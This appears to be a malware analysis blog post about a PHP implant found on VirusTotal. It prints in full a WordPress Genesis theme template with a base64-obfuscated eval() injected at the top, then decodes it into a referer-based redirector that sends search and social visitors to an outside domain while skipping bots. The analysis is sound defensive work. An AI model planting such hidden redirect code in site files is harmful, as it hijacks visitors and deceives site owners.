Skip to main content

Analysis: PHP.dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee

An analysis of a PHP implant I came across on VirusTotal Intelligence.

 

<?php      eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
/**
 * This file adds the Landing template to the Agency Theme.
 *
 * @author StudioPress
 * @package Agency
 * @subpackage Customizations
 */

/*
Template Name: Landing
*/

// Add custom body class to the head
add_filter( 'body_class', 'add_body_class' );
function add_body_class( $classes ) {
   $classes[] = 'agency-landing';
   return $classes;
}

// Remove header, navigation, breadcrumbs, footer widgets, footer 
add_filter( 'genesis_pre_get_option_site_layout', '__genesis_return_full_width_content' );
remove_action( 'genesis_header', 'genesis_header_markup_open', 5 );
remove_action( 'genesis_header', 'genesis_do_header' );
remove_action( 'genesis_header', 'genesis_header_markup_close', 15 );
remove_action( 'genesis_after_header', 'genesis_do_nav' );
remove_action( 'genesis_after_header', 'genesis_do_subnav' );
remove_action( 'genesis_before_content_sidebar_wrap', 'genesis_do_breadcrumbs');
remove_action( 'genesis_before_footer', 'genesis_footer_widget_areas' );
remove_action( 'genesis_footer', 'genesis_footer_markup_open', 5 );
remove_action( 'genesis_footer', 'genesis_do_footer' );
remove_action( 'genesis_footer', 'genesis_footer_markup_close', 15 );

genesis();

On an initial investigation of the file, it is pretty obvious there is something funky going on. Spot the eval() right at the beginning of the code…

The decoded eval looks like this:

<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://ibontu.25u.com/");
                    exit();
                }
            }
        }
    }
}

A quick glance over the script shows it is a ‘redirector’, which has the intention to redirect traffic to an alternative location, in this case: header("Location: http://ibontu.25u.com/");

The script also deflects requests from bots, to prevent the bots from being redirected to the alternative site.

Crude, but effective – somewhat :/

References

VirusTotal

Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis